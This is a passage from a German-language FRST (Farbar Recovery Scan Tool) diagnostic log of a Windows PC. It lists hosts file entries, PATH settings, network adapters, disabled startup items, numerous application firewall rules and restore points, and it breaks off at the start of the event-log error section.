Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2024-12-03] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
==================== Hosts Inhalt: =========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2021-06-05 13:08 - 2024-07-02 20:42 - 000000978 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 kubernetes.docker.internal
2022-03-01 17:52 - 2024-04-26 07:54 - 000000432 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics
172.17.144.1 E595.mshome.net # 2029 4 3 25 6 54 29 812
==================== Andere Bereiche ===========================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Python310\Scripts\;C:\Python310\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files\Git\cmd;C:\ProgramData\chocolatey\bin;C:\Program Files\nodejs\;C:\Program Files\Wireshark;;C:\Program Files\Microsoft VS Code\bin;C:\Program Files\Docker\Docker\resources\bin
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
HKU\S-1-5-21-1775496863-3233068474-2158662417-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Lisa\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalCache\Microsoft\IrisService\14087712868926777722\133800604814694731.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
ist aktiviert.
Network Binding:
=============
Ethernet 2: Realtek PCIe GbE Family Controller -> rt640x64.sys
WLAN: Realtek 8822BE Wireless LAN 802.11ac PCI-E NIC -> rtwlane.sys
Ethernet 6: TunnelBear Adapter V9 -> tap-tb-0901.sys
Bluetooth-Netzwerkverbindung: Bluetooth Device (Personal Area Network) -> bthpan.sys
vms_vsf: Erweiterungsfilter für virtuellen Hyper-V-Switch
oracle_VBoxNetLwf: VirtualBox NDIS6 Bridged Networking Driver
INSECURE_NPCAP: Npcap Packet Driver (NPCAP)
steamxboxndi: Steam Xbox Controller Enhanced Features Driver
vms_vsp: Extension-Protokoll für virtuellen Hyper-V-Switch
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
HKLM\...\StartupApproved\StartupFolder: => "ScpToolkit Tray Notifications.lnk"
HKLM\...\StartupApproved\StartupFolder: => "AnyDesk.lnk"
HKLM\...\StartupApproved\Run: => "Acrobat Assistant 8.0"
HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "RTKUGUI"
HKLM\...\StartupApproved\Run: => "SteelSeriesGG"
HKLM\...\StartupApproved\Run: => "Riot Vanguard"
HKLM\...\StartupApproved\Run32: => "Redirector"
HKLM\...\StartupApproved\Run32: => "ConnectionCenter"
HKLM\...\StartupApproved\Run32: => "AnalyticsSrv"
HKLM\...\StartupApproved\Run32: => "InstallHelper"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "Docker Desktop"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "Adobe Acrobat Synchronizer"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "GoogleDriveFS"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "LGHUB"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_EAC21D00D4BC08C838A9AA4DBEEC9392"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_11F810DC58703105CF0600BCC1ED96D2"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-1775496863-3233068474-2158662417-1002\...\StartupApproved\Run: => "OneDrive"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{14192B1F-3475-4D35-A2A5-3AB1482DBF2D}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_23306.3316.2574.4550_x64__8wekyb3d8bbwe\msteams.exe => Keine Datei
FirewallRules: [{FE3A2378-9FEF-42B1-9A5A-BB943D270785}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_23306.3316.2574.4550_x64__8wekyb3d8bbwe\msteams.exe => Keine Datei
FirewallRules: [UDP Query User{C2EE2005-D80F-42EC-9F9B-C3D823189A11}C:\program files (x86)\qnap\qsync\qsync.exe] => (Allow) C:\program files (x86)\qnap\qsync\qsync.exe (QNAP Systems, Inc. -> QNAP Systems, Inc.)
FirewallRules: [TCP Query User{EEBB902A-3FD2-48CB-B058-367D7EE82C48}C:\program files (x86)\qnap\qsync\qsync.exe] => (Allow) C:\program files (x86)\qnap\qsync\qsync.exe (QNAP Systems, Inc. -> QNAP Systems, Inc.)
FirewallRules: [{334347C5-59AB-4AA9-BD76-ED1BB39AE754}] => (Allow) D:\SteamLibrary\steamapps\common\Pioneers of Pagonia Demo\Pioneers of Pagonia.exe (Envision Entertainment GmbH) [Datei ist nicht signiert]
FirewallRules: [{ACB1A1BD-ADC8-4CD3-856D-2FB97EBE905E}] => (Allow) D:\SteamLibrary\steamapps\common\Pioneers of Pagonia Demo\Pioneers of Pagonia.exe (Envision Entertainment GmbH) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{8FB7045B-81C6-41E9-A885-B0DAE6F5BC76}C:\users\marcel\.platformio\python3\python.exe] => (Allow) C:\users\marcel\.platformio\python3\python.exe (Python Software Foundation -> Python Software Foundation)
FirewallRules: [TCP Query User{19576FC3-0578-4EC8-9B43-76A2291DCB12}C:\users\marcel\.platformio\python3\python.exe] => (Allow) C:\users\marcel\.platformio\python3\python.exe (Python Software Foundation -> Python Software Foundation)
FirewallRules: [UDP Query User{0E3A8E1D-80B6-4FC0-A10C-9FC17E143435}C:\program files (x86)\arduino\java\bin\javaw.exe] => (Allow) C:\program files (x86)\arduino\java\bin\javaw.exe
FirewallRules: [TCP Query User{4C7D98A8-E85A-48A4-AFF4-42DA92246BAD}C:\program files (x86)\arduino\java\bin\javaw.exe] => (Allow) C:\program files (x86)\arduino\java\bin\javaw.exe
FirewallRules: [{15021C5D-92CA-4AB8-9506-0DF81D1436EB}] => (Allow) D:\SteamLibrary\steamapps\common\Cities_Skylines\dowser.exe (Paradox Interactive AB (publ) -> )
FirewallRules: [{E128803B-DD01-404A-BE2B-2DE6B24D4123}] => (Allow) D:\SteamLibrary\steamapps\common\Cities_Skylines\dowser.exe (Paradox Interactive AB (publ) -> )
FirewallRules: [{C1BD47C4-1822-417A-B5EA-3CB226E1B4E1}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALaunchHelper.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{428E43B9-BF5D-4D89-8C5E-70189A75BB9A}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALocalHostSvc.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{0A263C69-66E1-4D5B-BC83-0952EB0DB473}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EALocalHostSvc.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{EDA696DE-7982-4352-B45C-3276DFC18818}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAGEP.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{32836274-E5B1-48B9-A1F6-02E554E886DC}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAGEP.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{90CE52F5-C388-4CF5-9CCD-214862C118EF}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EADesktop.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{4527B228-F197-4B7A-A2CE-1E3DC68DD14A}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EADesktop.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{57C795AE-B95B-44D5-BB91-922E1176E72B}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAConnect_microsoft.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{76F4A360-BF46-4CCD-99DA-B2BE547D046D}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAConnect_microsoft.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{A287667A-8C2B-4A38-949A-EDD394C05B7D}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [{74CB5C39-8B99-43C8-961A-88F145BC181D}] => (Allow) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe (Electronic Arts, Inc. -> Electronic Arts)
FirewallRules: [UDP Query User{B9C5081C-1D1D-4433-8EB8-874716DA5CD3}D:\epic games\amongus\among us.exe] => (Block) D:\epic games\amongus\among us.exe () [Datei ist nicht signiert]
FirewallRules: [TCP Query User{3F072579-0AA2-4944-9A69-4E220AF6F95F}D:\epic games\amongus\among us.exe] => (Block) D:\epic games\amongus\among us.exe () [Datei ist nicht signiert]
FirewallRules: [UDP Query User{7C420908-A0EC-4375-9EAF-A95572A1E596}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{E9BC4477-E4D8-4740-9D22-DD2F1B2E66F2}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [{84D3A0EC-E02B-4261-90D1-FB7FA75C9FAA}] => (Allow) D:\SteamLibrary\steamapps\common\TerraScape\TerraScape.exe () [Datei ist nicht signiert]
FirewallRules: [{CBBB11BB-A736-4F1E-8444-D8BDF1B11B96}] => (Allow) D:\SteamLibrary\steamapps\common\TerraScape\TerraScape.exe () [Datei ist nicht signiert]
FirewallRules: [{295F88FF-DD8A-4942-967E-7578CEE0FC94}] => (Allow) D:\SteamLibrary\steamapps\common\Satisfactory\FactoryGame.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{18A96541-0DBB-4EB4-8B8B-8314EADC8D51}] => (Allow) D:\SteamLibrary\steamapps\common\Satisfactory\FactoryGame.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{B0E3AE4E-B64A-4061-8687-318421A0A9B9}D:\riot games\riot client\riotclientservices.exe] => (Block) D:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [TCP Query User{F2EBABA9-1CDD-419C-ACE9-51F9E13B8BCB}D:\riot games\riot client\riotclientservices.exe] => (Block) D:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [UDP Query User{651175E5-6EB8-4612-8346-71EF36EA5FC3}D:\steamlibrary\steamapps\common\battlefield 2042\bf2042.exe] => (Block) D:\steamlibrary\steamapps\common\battlefield 2042\bf2042.exe => Keine Datei
FirewallRules: [TCP Query User{FB46DCF6-A97F-4E7F-A165-E83EBA515D0B}D:\steamlibrary\steamapps\common\battlefield 2042\bf2042.exe] => (Block) D:\steamlibrary\steamapps\common\battlefield 2042\bf2042.exe => Keine Datei
FirewallRules: [{E52D17CE-B2B9-40C7-B858-E3F66DFED41F}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{52E2EDD7-2470-49C9-B770-2A601D58F4C5}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{DC7C4E43-F3CE-4EBC-A315-F7D7DB475956}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{390190E8-BC8B-451F-A993-2C21F096D02D}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{066F638E-53EA-471B-8908-83C6D1FB0C35}C:\program files (x86)\arduino\java\bin\javaw.exe] => (Allow) C:\program files (x86)\arduino\java\bin\javaw.exe
FirewallRules: [TCP Query User{6BA38EF5-46C2-40A8-A2F3-C7D698739041}C:\program files (x86)\arduino\java\bin\javaw.exe] => (Allow) C:\program files (x86)\arduino\java\bin\javaw.exe
FirewallRules: [{16503204-0D3E-4EAB-84E6-452A2987DA32}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Planetbase\Planetbase.exe (Unity Technologies SF -> ) [Datei ist nicht signiert]
FirewallRules: [{752E924D-7035-4CC2-9C57-A29E45DF53A6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Planetbase\Planetbase.exe (Unity Technologies SF -> ) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{3EE66D67-6304-4E09-B3BB-C22A4DD1CEC0}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{A149D780-B99A-4380-A7E2-EB17DECC26DB}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Allow) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [{8DBDF2B4-95D6-4012-A9C7-126DED9AC42E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{009C4255-171E-4759-A1A2-9EA6827C2C19}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{4DBB9852-C924-4BC4-AC76-E577155C0BD6}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{2A6593E8-7F73-4B76-97E7-0F67D75D9CD5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{745DC4C0-3E19-41F4-BFDE-B7BBBD8E43CA}] => (Allow) LPort=24800
FirewallRules: [UDP Query User{C58B4C03-3FFA-46F2-A84F-91E108FF6779}C:\program files\nodejs\node.exe] => (Allow) C:\program files\nodejs\node.exe (OpenJS Foundation -> Node.js)
FirewallRules: [TCP Query User{CED3DA51-BE66-4555-8693-A3EDB2DB9E88}C:\program files\nodejs\node.exe] => (Allow) C:\program files\nodejs\node.exe (OpenJS Foundation -> Node.js)
FirewallRules: [UDP Query User{87A451E7-366A-4005-886E-12EB2857ED14}C:\program files\docker\docker\resources\com.docker.backend.exe] => (Allow) C:\program files\docker\docker\resources\com.docker.backend.exe (Docker Inc -> Docker Inc.)
FirewallRules: [TCP Query User{89381732-1477-4D3F-B5D8-7B5945572169}C:\program files\docker\docker\resources\com.docker.backend.exe] => (Allow) C:\program files\docker\docker\resources\com.docker.backend.exe (Docker Inc -> Docker Inc.)
FirewallRules: [{87A3E154-D589-418D-A672-EDA88216CC7B}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{9C74AE9E-80F7-482E-932F-CF0857F152C1}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{E8057188-0755-4717-8BAB-CA9D3B8A6C76}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{32679342-8A44-41B8-8C76-D9FA2382D65B}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{3D57F7D4-41AE-4AF6-BF71-FD1A695E22B0}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{B8555902-6D77-4A7C-8F74-AA193E4E9B8C}D:\program files (x86)\qnap\qsync\qsync.exe] => (Block) D:\program files (x86)\qnap\qsync\qsync.exe => Keine Datei
FirewallRules: [TCP Query User{5045EC28-4D7A-4F50-BC63-212E86FC593B}D:\program files (x86)\qnap\qsync\qsync.exe] => (Block) D:\program files (x86)\qnap\qsync\qsync.exe => Keine Datei
FirewallRules: [{BEC48A7A-6B64-4C4D-89F3-65CEFF23AE40}] => (Allow) C:\Program Files\Zoom\bin\airhost.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{91244D45-C787-4DDC-B450-280B0304B732}] => (Allow) C:\Program Files\Zoom\bin\airhost.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{05524846-2956-4CA0-A618-6C581D831256}] => (Allow) C:\Program Files\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [TCP Query User{C4BFA07D-2F99-4B5B-B86B-C80A9E39C8C0}C:\program files (x86)\qnap\qsync\qsync.exe] => (Allow) C:\program files (x86)\qnap\qsync\qsync.exe (QNAP Systems, Inc. -> QNAP Systems, Inc.)
FirewallRules: [UDP Query User{EB93A807-36E6-4F5A-B86D-168C6949A5FE}C:\program files (x86)\qnap\qsync\qsync.exe] => (Allow) C:\program files (x86)\qnap\qsync\qsync.exe (QNAP Systems, Inc. -> QNAP Systems, Inc.)
FirewallRules: [TCP Query User{6438087A-CDBC-467F-BF2B-5671111D6678}C:\users\marcel\appdata\roaming\mobaxterm\slash\bin\xwin_mobax.exe] => (Allow) C:\users\marcel\appdata\roaming\mobaxterm\slash\bin\xwin_mobax.exe (Mobatek -> Mobatek)
FirewallRules: [UDP Query User{60606262-430A-4F5D-B5D0-B3119ADB8573}C:\users\marcel\appdata\roaming\mobaxterm\slash\bin\xwin_mobax.exe] => (Allow) C:\users\marcel\appdata\roaming\mobaxterm\slash\bin\xwin_mobax.exe (Mobatek -> Mobatek)
FirewallRules: [{21230499-3AE8-4550-882F-819ED1517A38}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_24060.3103.2805.2099_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{0B0B602D-A0DF-4116-969E-D8495CEF680A}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_24060.3103.2805.2099_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{9AF989AC-01E0-4D23-B4C1-71FB206107DA}] => (Allow) C:\Program Files (x86)\Citrix\ICA Client\CitrixEnterpriseBrowser\CitrixEnterpriseBrowser.exe (Citrix Systems, Inc. -> Citrix Systems, Inc.)
FirewallRules: [{6A9B1CF6-65A3-4D35-9967-0DB54C567DD1}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{5A341A2F-98F0-4C81-91A5-347CEC96B3C1}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{66AEB5EE-1F81-40EF-943B-BEDE056C1FD8}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{88FD7BEB-A698-47A7-873C-C2BA5101A264}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [TCP Query User{21C7DCC2-00B0-450B-9E7A-52D1D9FE2D4A}C:\program files (x86)\citrix\ica client\hdxrtcengine.exe] => (Allow) C:\program files (x86)\citrix\ica client\hdxrtcengine.exe (Citrix Systems, Inc. -> Citrix Systems, Inc.)
FirewallRules: [UDP Query User{A9E14A45-9354-47AC-B502-080794FD200B}C:\program files (x86)\citrix\ica client\hdxrtcengine.exe] => (Allow) C:\program files (x86)\citrix\ica client\hdxrtcengine.exe (Citrix Systems, Inc. -> Citrix Systems, Inc.)
FirewallRules: [TCP Query User{8474D892-F860-4D91-A3EC-D86EAE74326E}C:\program files (x86)\citrix\ica client\hdxrtcengine.exe] => (Allow) C:\program files (x86)\citrix\ica client\hdxrtcengine.exe (Citrix Systems, Inc. -> Citrix Systems, Inc.)
FirewallRules: [UDP Query User{260D116A-0177-404A-8473-CEDF2BB24B98}C:\program files (x86)\citrix\ica client\hdxrtcengine.exe] => (Allow) C:\program files (x86)\citrix\ica client\hdxrtcengine.exe (Citrix Systems, Inc. -> Citrix Systems, Inc.)
FirewallRules: [{230382F7-748A-4A22-A642-1F953C2258EF}] => (Allow) C:\Program Files (x86)\Citrix\ICA Client\CitrixEnterpriseBrowser\CitrixEnterpriseBrowser.exe (Citrix Systems, Inc. -> Citrix Systems, Inc.)
FirewallRules: [{B8DF5061-C386-4E72-8013-F20C2109C3F5}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_24295.401.3195.9406_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{5F744424-E9EF-4E96-97E7-C6D961EFF32A}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_24295.401.3195.9406_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{CE0B260C-69F6-47E6-8E9A-23BE0D849B38}C:\users\marcel\appdata\local\arduino15\packages\esp32\hardware\esp32\2.0.11\tools\espota.exe] => (Allow) C:\users\marcel\appdata\local\arduino15\packages\esp32\hardware\esp32\2.0.11\tools\espota.exe () [Datei ist nicht signiert]
FirewallRules: [UDP Query User{AA605C87-505D-4FB2-8D90-552614DC7436}C:\users\marcel\appdata\local\arduino15\packages\esp32\hardware\esp32\2.0.11\tools\espota.exe] => (Allow) C:\users\marcel\appdata\local\arduino15\packages\esp32\hardware\esp32\2.0.11\tools\espota.exe () [Datei ist nicht signiert]
FirewallRules: [{F7711F94-5AC3-4B2D-886B-998DA191948F}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{ACC1F7AF-93E2-4244-80BD-4BAA9CDE2789}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.112\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{7509DE1C-6A1C-4837-979D-1F8A5E49BA2A}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{F79AA383-4EF6-4F15-A3AE-856663C07C58}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{BD49D64A-9374-490A-B8D4-4EC41BEFA6AC}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{65FA002A-522F-429F-866D-E8D8D1CF63EA}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{7E3320C4-8DBE-4E3C-9AC4-21E3DD7B129F}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{24A1B116-7896-497F-9313-DCEC9095FB32}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{01333AA6-7760-41A8-B634-9D1CE59E313C}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{56A6E1CD-0FB6-40BD-A77E-0B8B3DA39023}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{C7A60824-204A-4C2C-A2EA-F037A30F2389}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{D77CD640-13FC-4A07-B269-0D1E06AFCC61}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.253.438.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd)
FirewallRules: [{923461BC-67C1-431B-A82A-7813AB3591D8}] => (Allow) C:\Program Files\WindowsApps\MSTeams_24335.208.3315.1951_x64__8wekyb3d8bbwe\ms-teams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{0B7EB3DD-1209-4054-8F1B-6F985DC26863}] => (Allow) C:\Program Files\WindowsApps\MSTeams_24335.208.3315.1951_x64__8wekyb3d8bbwe\ms-teams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{5CF179D7-C4F3-4060-9674-083A53860929}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH)
FirewallRules: [{D7419AAC-1E92-470D-9F95-AE9FA2918D79}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH)
FirewallRules: [{AC0F6B97-5254-4011-945C-C2BA8B2DC1B6}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH)
FirewallRules: [{B30769F3-C72E-4977-81AD-52D3FE8A9429}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH)
FirewallRules: [{6D0D70AD-9205-438D-8AE3-4C9DA1BD94BA}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH)
FirewallRules: [{9DB8F727-D1E8-4E18-916B-50E666A373A4}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (AnyDesk Software GmbH -> AnyDesk Software GmbH)
==================== Wiederherstellungspunkte =========================
19-12-2024 20:58:49 Windows Update
27-12-2024 08:17:15 Windows Update
06-01-2025 08:29:44 Geplanter Prüfpunkt
==================== Fehlerhafte Geräte im Gerätemanager ============
==================== Fehlereinträge in der Ereignisanzeige: ========================
Applikationsfehler:
==================
Error: (12/30/2024 10:30:58 PM) (Source: VSS) (EventID: 8193) (User: )
